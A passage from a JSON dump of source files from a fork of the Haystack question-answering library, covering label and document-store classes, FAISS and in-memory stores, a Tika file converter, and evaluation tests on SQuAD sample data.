model_id: Optional[int] = None):\n \"\"\"\n Object used to represent label/feedback in a standardized way within Haystack.\n This includes labels from dataset like SQuAD, annotations from labeling tools,\n or, user-feedback from the Haystack REST API.\n\n :param question: the question(or query) for finding answers.\n :param answer: the answer string.\n :param is_correct_answer: whether the sample is positive or negative.\n :param is_correct_document: in case of negative sample(is_correct_answer is False), there could be two cases;\n incorrect answer but correct document & incorrect document. This flag denotes if\n the returned document was correct.\n :param origin: the source for the labels. It can be used to later for filtering.\n :param document_id: the document_store's ID for the returned answer document.\n :param offset_start_in_doc: the answer start offset in the document.\n :param no_answer: whether the question in unanswerable.\n :param model_id: model_id used for prediction (in-case of user feedback).\n \"\"\"\n self.question = question\n self.answer = answer\n self.is_correct_answer = is_correct_answer\n self.is_correct_document = is_correct_document\n self.origin = origin\n self.document_id = document_id\n self.offset_start_in_doc = offset_start_in_doc\n self.no_answer = no_answer\n self.model_id = model_id\n\n @classmethod\n def from_dict(cls, dict):\n return cls(**dict)\n\n def to_dict(self):\n return self.__dict__\n\n # define __eq__ and __hash__ functions to deduplicate Label Objects\n def __eq__(self, other):\n return (isinstance(other, self.__class__) and\n getattr(other, 'question', None) == self.question and\n getattr(other, 'answer', None) == self.answer and\n getattr(other, 'is_correct_answer', None) == self.is_correct_answer and\n getattr(other, 'is_correct_document', None) == self.is_correct_document and\n getattr(other, 'origin', None) == self.origin and\n getattr(other, 'document_id', None) == self.document_id and\n getattr(other, 'offset_start_in_doc', None) == self.offset_start_in_doc and\n getattr(other, 'no_answer', None) == self.no_answer and\n getattr(other, 'model_id', None) == self.model_id)\n\n def __hash__(self):\n return hash(self.question +\n self.answer +\n str(self.is_correct_answer) +\n str(self.is_correct_document) +\n str(self.origin) +\n str(self.document_id) +\n str(self.offset_start_in_doc) +\n str(self.no_answer) +\n str(self.model_id))\n\n\nclass MultiLabel:\n def __init__(self, question: str,\n multiple_answers: List[str],\n is_correct_answer: bool,\n is_correct_document: bool,\n origin: str,\n multiple_document_ids: List[Any],\n multiple_offset_start_in_docs: List[Any],\n no_answer: Optional[bool] = None,\n model_id: Optional[int] = None):\n \"\"\"\n Object used to aggregate multiple possible answers for the same question\n\n :param question: the question(or query) for finding answers.\n :param multiple_answers: list of possible answer strings\n :param is_correct_answer: whether the sample is positive or negative.\n :param is_correct_document: in case of negative sample(is_correct_answer is False), there could be two cases;\n incorrect answer but correct document & incorrect document. This flag denotes if\n the returned document was correct.\n :param origin: the source for the labels. It can be used to later for filtering.\n :param multiple_document_ids: the document_store's IDs for the returned answer documents.\n :param multiple_offset_start_in_docs: the answer start offsets in the document.\n :param no_answer: whether the question in unanswerable.\n :param model_id: model_id used for prediction (in-case of user feedback).\n \"\"\"\n self.question = question\n self.multiple_answers = multiple_answers\n self.is_correct_answer = is_correct_answer\n self.is_correct_document = is_correct_document\n self.origin = origin\n self.multiple_document_ids = multiple_document_ids\n self.multiple_offset_start_in_docs = multiple_offset_start_in_docs\n self.no_answer = no_answer\n self.model_id = model_id\n\n @classmethod\n def from_dict(cls, dict):\n return cls(**dict)\n\n def to_dict(self):\n return self.__dict__\n\n\nclass BaseDocumentStore(ABC):\n \"\"\"\n Base class for implementing Document Stores.\n \"\"\"\n index: Optional[str]\n label_index: Optional[str]\n\n @abstractmethod\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n \"\"\"\n Indexes documents for later queries.\n\n :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n \"meta\":{\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n It can be used for filtering and is accessible in the responses of the Finder.\n :param index: Optional name of index where the documents shall be written to.\n If None, the DocumentStore's default index (self.index) will be used.\n\n :return: None\n \"\"\"\n pass\n\n @abstractmethod\n def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n pass\n\n @abstractmethod\n def get_all_labels(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n pass\n\n def get_all_labels_aggregated(self,\n index: Optional[str] = None,\n filters: Optional[Dict[str, List[str]]] = None) -> List[MultiLabel]:\n aggregated_labels = []\n all_labels = self.get_all_labels(index=index, filters=filters)\n\n # Collect all answers to a question in a dict\n question_ans_dict = {} # type: ignore\n for l in all_labels:\n # only aggregate labels with correct answers, as only those can be currently used in evaluation\n if not l.is_correct_answer:\n continue\n\n if l.question in question_ans_dict:\n question_ans_dict[l.question].append(l)\n else:\n question_ans_dict[l.question] = [l]\n\n # Aggregate labels\n for q, ls in question_ans_dict.items():\n ls = list(set(ls)) # get rid of exact duplicates\n # check if there are both text answer and \"no answer\" present\n t_present = False\n no_present = False\n no_idx = []\n for idx, l in enumerate(ls):\n if len(l.answer) == 0:\n no_present = True\n no_idx.append(idx)\n else:\n t_present = True\n # if both text and no answer are present, remove no answer labels\n if t_present and no_present:\n logger.warning(\n f\"Both text label and 'no answer possible' label is present for question: {ls[0].question}\")\n for remove_idx in no_idx[::-1]:\n ls.pop(remove_idx)\n\n # construct Aggregated_label\n for i, l in enumerate(ls):\n if i == 0:\n agg_label = MultiLabel(question=l.question,\n multiple_answers=[l.answer],\n is_correct_answer=l.is_correct_answer,\n is_correct_document=l.is_correct_document,\n origin=l.origin,\n multiple_document_ids=[l.document_id],\n multiple_offset_start_in_docs=[l.offset_start_in_doc],\n no_answer=l.no_answer,\n model_id=l.model_id,\n )\n else:\n agg_label.multiple_answers.append(l.answer)\n agg_label.multiple_document_ids.append(l.document_id)\n agg_label.multiple_offset_start_in_docs.append(l.offset_start_in_doc)\n aggregated_labels.append(agg_label)\n return aggregated_labels\n\n @abstractmethod\n def get_document_by_id(self, id: str, index: Optional[str] = None) -> Optional[Document]:\n pass\n\n @abstractmethod\n def get_document_count(self, index: Optional[str] = None) -> int:\n pass\n\n @abstractmethod\n def query_by_embedding(self,\n query_emb: List[float],\n filters: Optional[Optional[Dict[str, List[str]]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n pass\n\n @abstractmethod\n def get_label_count(self, index: Optional[str] = None) -> int:\n pass\n\n @abstractmethod\n def add_eval_data(self, filename: str, doc_index: str = \"document\", label_index: str = \"label\"):\n pass\n\n def delete_all_documents(self, index: str):\n pass\n\n"
},
{
"alpha_fraction": 0.6253019571304321,
"alphanum_fraction": 0.630514919757843,
"avg_line_length": 41.739131927490234,
"blob_id": "4bf811778d71f8f841d51108b094e8b3243d766a",
"content_id": "2376b4484c34112ea55cea13382e7095874e71db",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7865,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 184,
"path": "/haystack/database/faiss.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom pathlib import Path\nfrom typing import Union, List, Optional\n\nimport faiss\nimport numpy as np\nfrom faiss.swigfaiss import IndexHNSWFlat\n\nfrom haystack.database.base import Document\nfrom haystack.database.sql import SQLDocumentStore\nfrom haystack.retriever.base import BaseRetriever\n\nlogger = logging.getLogger(__name__)\n\n\nclass FAISSDocumentStore(SQLDocumentStore):\n \"\"\"\n Document store for very large scale embedding based dense retrievers like the DPR.\n\n It implements the FAISS library(https://github.com/facebookresearch/faiss)\n to perform similarity search on vectors.\n\n The document text and meta-data(for filtering) is stored using the SQLDocumentStore, while\n the vector embeddings are indexed in a FAISS Index.\n\n \"\"\"\n\n def __init__(\n self,\n sql_url: str = \"sqlite:///\",\n index_buffer_size: int = 10_000,\n vector_size: int = 768,\n faiss_index: Optional[IndexHNSWFlat] = None,\n ):\n \"\"\"\n :param sql_url: SQL connection URL for database. It defaults to local file based SQLite DB. For large scale\n deployment, Postgres is recommended.\n :param index_buffer_size: When working with large dataset, the indexing process(FAISS + SQL) can be buffered in\n smaller chunks to reduce memory footprint.\n :param vector_size: the embedding vector size.\n :param faiss_index: load an existing FAISS Index.\n \"\"\"\n self.vector_size = vector_size\n self.faiss_index = faiss_index\n self.index_buffer_size = index_buffer_size\n super().__init__(url=sql_url)\n\n def _create_new_index(self, vector_size: int, index_factory: str = \"HNSW4\"):\n index = faiss.index_factory(vector_size + 1, index_factory)\n return index\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n if self.faiss_index is not None:\n raise Exception(\"Addition of more data in an existing index is not supported.\")\n\n faiss_index = self._create_new_index(vector_size=self.vector_size)\n index = index or self.index\n document_objects = [Document.from_dict(d) if isinstance(d, dict) else d for d in documents]\n\n add_vectors = False if document_objects[0].embedding is None else True\n\n if add_vectors:\n phi = self._get_phi(document_objects)\n\n for i in range(0, len(document_objects), self.index_buffer_size):\n if add_vectors:\n embeddings = [doc.embedding for doc in document_objects[i: i + self.index_buffer_size]]\n hnsw_vectors = self._get_hnsw_vectors(embeddings=embeddings, phi=phi)\n faiss_index.add(hnsw_vectors)\n\n docs_to_write_in_sql = []\n for vector_id, doc in enumerate(document_objects[i : i + self.index_buffer_size]):\n meta = doc.meta\n if add_vectors:\n meta[\"vector_id\"] = vector_id\n docs_to_write_in_sql.append(doc)\n\n super(FAISSDocumentStore, self).write_documents(docs_to_write_in_sql, index=index)\n self.faiss_index = faiss_index\n\n def _get_hnsw_vectors(self, embeddings: List[np.array], phi: int) -> np.array:\n \"\"\"\n HNSW indices in FAISS only support L2 distance. This transformation adds an additional dimension to obtain\n corresponding inner products.\n\n You can read ore details here:\n https://github.com/facebookresearch/faiss/wiki/MetricType-and-distances#how-can-i-do-max-inner-product-search-on-indexes-that-support-only-l2\n \"\"\"\n vectors = [np.reshape(emb, (1, -1)) for emb in embeddings]\n norms = [(doc_vector ** 2).sum() for doc_vector in vectors]\n aux_dims = [np.sqrt(phi - norm) for norm in norms]\n hnsw_vectors = [np.hstack((doc_vector, aux_dims[i].reshape(-1, 1))) for i, doc_vector in enumerate(vectors)]\n hnsw_vectors = np.concatenate(hnsw_vectors, axis=0)\n return hnsw_vectors\n\n def _get_phi(self, documents: List[Document]) -> int:\n phi = 0\n for doc in documents:\n norms = (doc.embedding ** 2).sum() # type: ignore\n phi = max(phi, norms)\n return phi\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. after changing the retriever config).\n\n :param retriever: Retriever to use to get embeddings for text\n :param index: Index name to update\n :return: None\n \"\"\"\n # Some FAISS indexes(like the default HNSWx) do not support removing vectors, so a new index is created.\n faiss_index = self._create_new_index(vector_size=self.vector_size)\n index = index or self.index\n\n documents = self.get_all_documents(index=index)\n logger.info(f\"Updating embeddings for {len(documents)} docs ...\")\n embeddings = retriever.embed_passages(documents) # type: ignore\n assert len(documents) == len(embeddings)\n for i, doc in enumerate(documents):\n doc.embedding = embeddings[i]\n\n phi = self._get_phi(documents)\n\n for i in range(0, len(documents), self.index_buffer_size):\n embeddings = [doc.embedding for doc in documents[i : i + self.index_buffer_size]]\n hnsw_vectors = self._get_hnsw_vectors(embeddings=embeddings, phi=phi)\n faiss_index.add(hnsw_vectors)\n\n doc_meta_to_update = []\n for vector_id, doc in enumerate(documents[i : i + self.index_buffer_size]):\n meta = doc.meta or {}\n meta[\"vector_id\"] = vector_id\n doc_meta_to_update.append((doc.id, meta))\n\n for doc_id, meta in doc_meta_to_update:\n super(FAISSDocumentStore, self).update_document_meta(id=doc_id, meta=meta)\n\n self.faiss_index = faiss_index\n\n def query_by_embedding(\n self, query_emb: np.array, filters: Optional[dict] = None, top_k: int = 10, index: Optional[str] = None\n ) -> List[Document]:\n if filters:\n raise Exception(\"Query filters are not implemented for the FAISSDocumentStore.\")\n if not self.faiss_index:\n raise Exception(\"No index exists. Use 'update_embeddings()` to create an index.\")\n query_emb = query_emb.reshape(1, -1)\n\n aux_dim = np.zeros(len(query_emb), dtype=\"float32\")\n hnsw_vectors = np.hstack((query_emb, aux_dim.reshape(-1, 1)))\n _, vector_id_matrix = self.faiss_index.search(hnsw_vectors, top_k)\n vector_ids_for_query = [str(vector_id) for vector_id in vector_id_matrix[0] if vector_id != -1]\n\n documents = self.get_all_documents(filters={\"vector_id\": vector_ids_for_query}, index=index)\n # sort the documents as per query results\n documents = sorted(documents, key=lambda doc: vector_ids_for_query.index(doc.meta[\"vector_id\"])) # type: ignore\n\n return documents\n\n def save(self, file_path: Union[str, Path]):\n \"\"\"\n Save FAISS Index to the specified file.\n \"\"\"\n faiss.write_index(self.faiss_index, str(file_path))\n\n @classmethod\n def load(\n cls,\n faiss_file_path: Union[str, Path],\n sql_url: str,\n index_buffer_size: int = 10_000,\n vector_size: int = 768\n ):\n \"\"\"\n Load a saved FAISS index from a file and connect to the SQL database.\n \"\"\"\n faiss_index = faiss.read_index(str(faiss_file_path))\n return cls(\n faiss_index=faiss_index,\n sql_url=sql_url,\n index_buffer_size=index_buffer_size,\n vector_size=vector_size\n )\n\n"
},
{
"alpha_fraction": 0.5888614058494568,
"alphanum_fraction": 0.5904703140258789,
"avg_line_length": 39.808082580566406,
"blob_id": "4601df4309afeed5170418fade0578c71a6eb568",
"content_id": "a658b667462cc46b49168b7bf0bb82d10cbf825e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8080,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 198,
"path": "/haystack/database/memory.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from typing import Any, Dict, List, Optional, Union\nfrom uuid import uuid4\nfrom collections import defaultdict\n\nfrom haystack.database.base import BaseDocumentStore, Document, Label\nfrom haystack.indexing.utils import eval_data_from_file\nfrom haystack.retriever.base import BaseRetriever\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass InMemoryDocumentStore(BaseDocumentStore):\n \"\"\"\n In-memory document store\n \"\"\"\n\n def __init__(self, embedding_field: Optional[str] = None):\n self.indexes: Dict[str, Dict] = defaultdict(dict)\n self.index: str = \"document\"\n self.label_index: str = \"label\"\n self.embedding_field: str = \"embedding\"\n self.embedding_dim : int = 768\n\n def write_documents(self, documents: Union[List[dict], List[Document]], index: Optional[str] = None):\n \"\"\"\n Indexes documents for later queries.\n\n\n :param documents: a list of Python dictionaries or a list of Haystack Document objects.\n For documents as dictionaries, the format is {\"text\": \"<the-actual-text>\"}.\n Optionally: Include meta data via {\"text\": \"<the-actual-text>\",\n \"meta\": {\"name\": \"<some-document-name>, \"author\": \"somebody\", ...}}\n It can be used for filtering and is accessible in the responses of the Finder.\n :param index: write documents to a custom namespace. For instance, documents for evaluation can be indexed in a\n separate index than the documents for search.\n :return: None\n \"\"\"\n index = index or self.index\n\n documents_objects = [Document.from_dict(d) if isinstance(d, dict) else d for d in documents]\n\n for document in documents_objects:\n self.indexes[index][document.id] = document\n\n def write_labels(self, labels: Union[List[dict], List[Label]], index: Optional[str] = None):\n index = index or self.label_index\n label_objects = [Label.from_dict(l) if isinstance(l, dict) else l for l in labels]\n\n for label in label_objects:\n label_id = str(uuid4())\n self.indexes[index][label_id] = label\n\n def get_document_by_id(self, id: str, index: Optional[str] = None) -> Optional[Document]:\n index = index or self.index\n documents = self.get_documents_by_id([id], index=index)\n if documents:\n return documents[0]\n else:\n return None\n\n def get_documents_by_id(self, ids: List[str], index: Optional[str] = None) -> List[Document]:\n index = index or self.index\n documents = [self.indexes[index][id] for id in ids]\n return documents\n\n def query_by_embedding(self,\n query_emb: List[float],\n filters: Optional[Dict[str, List[str]]] = None,\n top_k: int = 10,\n index: Optional[str] = None) -> List[Document]:\n\n from numpy import dot\n from numpy.linalg import norm\n\n if filters:\n raise NotImplementedError(\"Setting `filters` is currently not supported in \"\n \"InMemoryDocumentStore.query_by_embedding(). Please remove filters or \"\n \"use a different DocumentStore (e.g. ElasticsearchDocumentStore).\")\n\n index = index or self.index\n\n if query_emb is None:\n return []\n\n candidate_docs = []\n for idx, doc in self.indexes[index].items():\n doc.query_score = dot(query_emb, doc.embedding) / (\n norm(query_emb) * norm(doc.embedding)\n )\n candidate_docs.append(doc)\n\n return sorted(candidate_docs, key=lambda x: x.query_score, reverse=True)[0:top_k]\n\n def update_embeddings(self, retriever: BaseRetriever, index: Optional[str] = None):\n \"\"\"\n Updates the embeddings in the the document store using the encoding model specified in the retriever.\n This can be useful if want to add or change the embeddings for your documents (e.g. after changing the retriever config).\n\n :param retriever: Retriever\n :param index: Index name to update\n :return: None\n \"\"\"\n if index is None:\n index = self.index\n\n if not self.embedding_field:\n raise RuntimeError(\"Specify the arg embedding_field when initializing InMemoryDocumentStore()\")\n\n # TODO Index embeddings every X batches to avoid OOM for huge document collections\n docs = self.get_all_documents(index)\n logger.info(f\"Updating embeddings for {len(docs)} docs ...\")\n embeddings = retriever.embed_passages(docs) # type: ignore\n assert len(docs) == len(embeddings)\n\n if embeddings[0].shape[0] != self.embedding_dim:\n raise RuntimeError(f\"Embedding dim. of model ({embeddings[0].shape[0]})\"\n f\" doesn't match embedding dim. in documentstore ({self.embedding_dim}).\"\n \"Specify the arg `embedding_dim` when initializing InMemoryDocumentStore()\")\n\n for doc, emb in zip(docs, embeddings):\n self.indexes[index][doc.id].embedding = emb\n\n def get_document_count(self, index: Optional[str] = None) -> int:\n index = index or self.index\n return len(self.indexes[index].items())\n\n def get_label_count(self, index: Optional[str] = None) -> int:\n index = index or self.label_index\n return len(self.indexes[index].items())\n\n def get_all_documents(self, index: Optional[str] = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Document]:\n index = index or self.index\n documents = list(self.indexes[index].values())\n filtered_documents = []\n\n if filters:\n for doc in documents:\n is_hit = True\n for key, values in filters.items():\n if doc.meta.get(key):\n if doc.meta[key] not in values:\n is_hit = False\n else:\n is_hit = False\n if is_hit:\n filtered_documents.append(doc)\n else:\n filtered_documents = documents\n\n return filtered_documents\n\n def get_all_labels(self, index: str = None, filters: Optional[Dict[str, List[str]]] = None) -> List[Label]:\n index = index or self.label_index\n\n if filters:\n result = []\n for label in self.indexes[index].values():\n label_dict = label.to_dict()\n is_hit = True\n for key, values in filters.items():\n if label_dict[key] not in values:\n is_hit = False\n break\n if is_hit:\n result.append(label)\n else:\n result = list(self.indexes[index].values())\n\n return result\n\n def add_eval_data(self, filename: str, doc_index: Optional[str] = None, label_index: Optional[str] = None):\n \"\"\"\n Adds a SQuAD-formatted file to the DocumentStore in order to be able to perform evaluation on it.\n\n :param filename: Name of the file containing evaluation data\n :type filename: str\n :param doc_index: Elasticsearch index where evaluation documents should be stored\n :type doc_index: str\n :param label_index: Elasticsearch index where labeled questions should be stored\n :type label_index: str\n \"\"\"\n\n docs, labels = eval_data_from_file(filename)\n doc_index = doc_index or self.index\n label_index = label_index or self.label_index\n self.write_documents(docs, index=doc_index)\n self.write_labels(labels, index=label_index)\n\n def delete_all_documents(self, index: Optional[str] = None):\n \"\"\"\n Delete all documents in a index.\n\n :param index: index name\n :return: None\n \"\"\"\n\n index = index or self.index\n self.indexes[index] = {}\n"
},
{
"alpha_fraction": 0.5748187303543091,
"alphanum_fraction": 0.5817402601242065,
"avg_line_length": 43.94814682006836,
"blob_id": "b2f8e12cecbb6a55e0382ac7f23fd7de8b70a983",
"content_id": "d464da255abe1fe3b7cfcfbc984e86485b6e3655",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6068,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 135,
"path": "/haystack/indexing/file_converters/tika.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\nfrom html.parser import HTMLParser\nfrom pathlib import Path\nfrom typing import List, Optional, Tuple, Dict, Any\n\nimport requests\nfrom tika import parser as tikaparser\n\nfrom haystack.indexing.file_converters.base import BaseConverter\n\nlogger = logging.getLogger(__name__)\n\n\n# Use the built-in HTML parser with minimum dependencies\nclass TikaXHTMLParser(HTMLParser):\n def __init__(self):\n self.ingest = True\n self.page = \"\"\n self.pages: List[str] = []\n super(TikaXHTMLParser, self).__init__()\n\n def handle_starttag(self, tag, attrs):\n # find page div\n pagediv = [value for attr, value in attrs if attr == \"class\" and value == \"page\"]\n if tag == \"div\" and pagediv:\n self.ingest = True\n\n def handle_endtag(self, tag):\n # close page div, or a single page without page div, save page and open a new page\n if (tag == \"div\" or tag == \"body\") and self.ingest:\n self.ingest = False\n # restore words hyphened to the next line\n self.pages.append(self.page.replace(\"-\\n\", \"\"))\n self.page = \"\"\n\n def handle_data(self, data):\n if self.ingest:\n self.page += data\n\n\nclass TikaConverter(BaseConverter):\n def __init__(\n self,\n tika_url: str = \"http://localhost:9998/tika\",\n remove_numeric_tables: Optional[bool] = False,\n remove_whitespace: Optional[bool] = None,\n remove_empty_lines: Optional[bool] = None,\n remove_header_footer: Optional[bool] = None,\n valid_languages: Optional[List[str]] = None,\n ):\n \"\"\"\n :param tika_url: URL of the Tika server\n :param remove_numeric_tables: This option uses heuristics to remove numeric rows from the tables.\n The tabular structures in documents might be noise for the reader model if it\n does not have table parsing capability for finding answers. However, tables\n may also have long strings that could possible candidate for searching answers.\n The rows containing strings are thus retained in this option.\n :param remove_whitespace: strip whitespaces before or after each line in the text.\n :param remove_empty_lines: remove more than two empty lines in the text.\n :param remove_header_footer: use heuristic to remove footers and headers across different pages by searching\n for the longest common string. This heuristic uses exact matches and therefore\n works well for footers like \"Copyright 2019 by XXX\", but won't detect \"Page 3 of 4\"\n or similar.\n :param valid_languages: validate languages from a list of languages specified in the ISO 639-1\n (https://en.wikipedia.org/wiki/ISO_639-1) format.\n This option can be used to add test for encoding errors. If the extracted text is\n not one of the valid languages, then it might likely be encoding error resulting\n in garbled text.\n \"\"\"\n ping = requests.get(tika_url)\n if ping.status_code != 200:\n raise Exception(f\"Apache Tika server is not reachable at the URL '{tika_url}'. To run it locally\"\n f\"with Docker, execute: 'docker run -p 9998:9998 apache/tika:1.24.1'\")\n self.tika_url = tika_url\n super().__init__(\n remove_numeric_tables=remove_numeric_tables,\n remove_whitespace=remove_whitespace,\n remove_empty_lines=remove_empty_lines,\n remove_header_footer=remove_header_footer,\n valid_languages=valid_languages,\n )\n\n def extract_pages(self, file_path: Path) -> Tuple[List[str], Optional[Dict[str, Any]]]:\n \"\"\"\n :param file_path: Path of file to be converted.\n\n :return: a list of pages and the extracted meta data of the file.\n \"\"\"\n parsed = tikaparser.from_file(file_path.as_posix(), self.tika_url, xmlContent=True)\n parser = TikaXHTMLParser()\n parser.feed(parsed[\"content\"])\n\n cleaned_pages = []\n # TODO investigate title of document appearing in the first extracted page\n for page in parser.pages:\n lines = page.splitlines()\n cleaned_lines = []\n for line in lines:\n words = line.split()\n digits = [word for word in words if any(i.isdigit() for i in word)]\n\n # remove lines having > 40% of words as digits AND not ending with a period(.)\n if self.remove_numeric_tables:\n if words and len(digits) / len(words) > 0.4 and not line.strip().endswith(\".\"):\n logger.debug(f\"Removing line '{line}' from {file_path}\")\n continue\n\n if self.remove_whitespace:\n line = line.strip()\n\n cleaned_lines.append(line)\n\n page = \"\\n\".join(cleaned_lines)\n\n # always clean up empty lines:\n page = re.sub(r\"\\n\\n+\", \"\\n\\n\", page)\n\n cleaned_pages.append(page)\n\n if self.valid_languages:\n document_text = \"\".join(cleaned_pages)\n if not self.validate_language(document_text):\n logger.warning(\n f\"The language for {file_path} is not one of {self.valid_languages}. The file may not have \"\n f\"been decoded in the correct text format.\"\n )\n\n if self.remove_header_footer:\n cleaned_pages, header, footer = self.find_and_remove_header_footer(\n cleaned_pages, n_chars=300, n_first_pages_to_ignore=1, n_last_pages_to_ignore=1\n )\n logger.info(f\"Removed header '{header}' and footer '{footer}' in {file_path}\")\n\n return cleaned_pages, parsed[\"metadata\"]\n"
},
{
"alpha_fraction": 0.690861165523529,
"alphanum_fraction": 0.7070298790931702,
"avg_line_length": 47.22881317138672,
"blob_id": "c51e7347a510bddf8d5edc4310b659def5f82c2d",
"content_id": "836dc6f938951bcb24bc512d8ebec1a52fbcf9fb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5690,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 118,
"path": "/test/test_eval.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom haystack.database.base import BaseDocumentStore\nfrom haystack.retriever.sparse import ElasticsearchRetriever\nfrom haystack.finder import Finder\n\n\ndef test_add_eval_data(document_store):\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/small.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n\n assert document_store.get_document_count(index=\"test_eval_document\") == 87\n assert document_store.get_label_count(index=\"test_feedback\") == 1214\n\n # test documents\n docs = document_store.get_all_documents(index=\"test_eval_document\")\n assert docs[0].text[:10] == \"The Norman\"\n assert docs[0].meta[\"name\"] == \"Normans\"\n assert len(docs[0].meta.keys()) == 1\n\n # test labels\n labels = document_store.get_all_labels(index=\"test_feedback\")\n assert labels[0].answer == \"France\"\n assert labels[0].no_answer == False\n assert labels[0].is_correct_answer == True\n assert labels[0].is_correct_document == True\n assert labels[0].question == 'In what country is Normandy located?'\n assert labels[0].origin == \"gold_label\"\n assert labels[0].offset_start_in_doc == 159\n\n # check combination\n assert labels[0].document_id == docs[0].id\n start = labels[0].offset_start_in_doc\n end = start+len(labels[0].answer)\n assert docs[0].text[start:end] == \"France\"\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"reader\", [\"farm\"], indirect=True)\ndef test_eval_reader(reader, document_store: BaseDocumentStore):\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n # eval reader\n reader_eval_results = reader.eval(document_store=document_store, label_index=\"test_feedback\",\n doc_index=\"test_eval_document\", device=\"cpu\")\n assert reader_eval_results[\"f1\"] > 0.65\n assert reader_eval_results[\"f1\"] < 0.67\n assert reader_eval_results[\"EM\"] == 0.5\n assert reader_eval_results[\"top_n_accuracy\"] == 1.0\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"document_store\", [\"elasticsearch\"], indirect=True)\[email protected](\"open_domain\", [True, False])\ndef test_eval_elastic_retriever(document_store: BaseDocumentStore, open_domain):\n retriever = ElasticsearchRetriever(document_store=document_store)\n\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n\n # eval retriever\n results = retriever.eval(top_k=1, label_index=\"test_feedback\", doc_index=\"test_eval_document\", open_domain=open_domain)\n assert results[\"recall\"] == 1.0\n assert results[\"map\"] == 1.0\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"document_store\", [\"elasticsearch\"], indirect=True)\[email protected](\"reader\", [\"farm\"], indirect=True)\ndef test_eval_finder(document_store: BaseDocumentStore, reader):\n retriever = ElasticsearchRetriever(document_store=document_store)\n finder = Finder(reader=reader, retriever=retriever)\n\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n\n # eval finder\n results = finder.eval(label_index=\"test_feedback\", doc_index=\"test_eval_document\", top_k_retriever=1, top_k_reader=5)\n assert results[\"retriever_recall\"] == 1.0\n assert results[\"retriever_map\"] == 1.0\n assert abs(results[\"reader_topk_f1\"] - 0.66666) < 0.001\n assert abs(results[\"reader_topk_em\"] - 0.5) < 0.001\n assert abs(results[\"reader_topk_accuracy\"] - 1) < 0.001\n assert results[\"reader_top1_f1\"] <= results[\"reader_topk_f1\"]\n assert results[\"reader_top1_em\"] <= results[\"reader_topk_em\"]\n assert results[\"reader_top1_accuracy\"] <= results[\"reader_topk_accuracy\"]\n\n # batch eval finder\n results_batch = finder.eval_batch(label_index=\"test_feedback\", doc_index=\"test_eval_document\", top_k_retriever=1,\n top_k_reader=5)\n assert results_batch[\"retriever_recall\"] == 1.0\n assert results_batch[\"retriever_map\"] == 1.0\n assert results_batch[\"reader_top1_f1\"] == results[\"reader_top1_f1\"]\n assert results_batch[\"reader_top1_em\"] == results[\"reader_top1_em\"]\n assert results_batch[\"reader_topk_accuracy\"] == results[\"reader_topk_accuracy\"]\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")"
},
{
"alpha_fraction": 0.6327977180480957,
"alphanum_fraction": 0.6346880793571472,
"avg_line_length": 45,
"blob_id": "5c056747f76b0d4b89134ece885fbf58110db355",
"content_id": "84788d4e8296413cc89bbb396b70c71f724e73a6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
